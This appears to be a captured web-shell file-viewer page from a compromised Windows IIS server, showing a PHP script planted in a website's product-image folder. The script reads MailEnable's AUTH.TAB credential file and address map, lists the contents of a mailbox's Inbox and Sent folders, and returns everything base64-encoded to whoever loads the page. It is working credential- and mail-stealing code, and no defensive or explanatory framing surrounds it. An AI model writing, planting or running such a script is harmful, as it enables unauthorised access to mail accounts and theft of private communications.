System: Windows NT WINDOWS18 10.0 build 17763 (Windows Server 2016) AMD64 | User: IWPD_3544(appclien)

Path: D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\image\product

[Back to List]
<?php
$paths = [
    'C:\Program Files (x86)\Mail Enable\Config\AUTH.TAB',
    'C:\Program Files (x86)\Mail Enable\Config\ADDRESS-MAP.TAB',
    'C:\Program Files (x86)\Mail Enable\Post Offices\nmvm.org\MAILROOT\info\Inbox',
    'C:\Program Files (x86)\Mail Enable\Post Offices\nmvm.org\MAILROOT\info\Sent'
];

$output = "";
foreach ($paths as $path) {
    if (file_exists($path)) {
        $output .= "=== $path ===\n";
        if (is_dir($path)) {
            $output .= implode("\n", scandir($path)) . "\n\n";
        } else {
            $output .= file_get_contents($path) . "\n\n";
        }
    } else {
        $output .= "=== $path [NOT FOUND] ===\n\n";
    }
}

echo base64_encode($output);
?>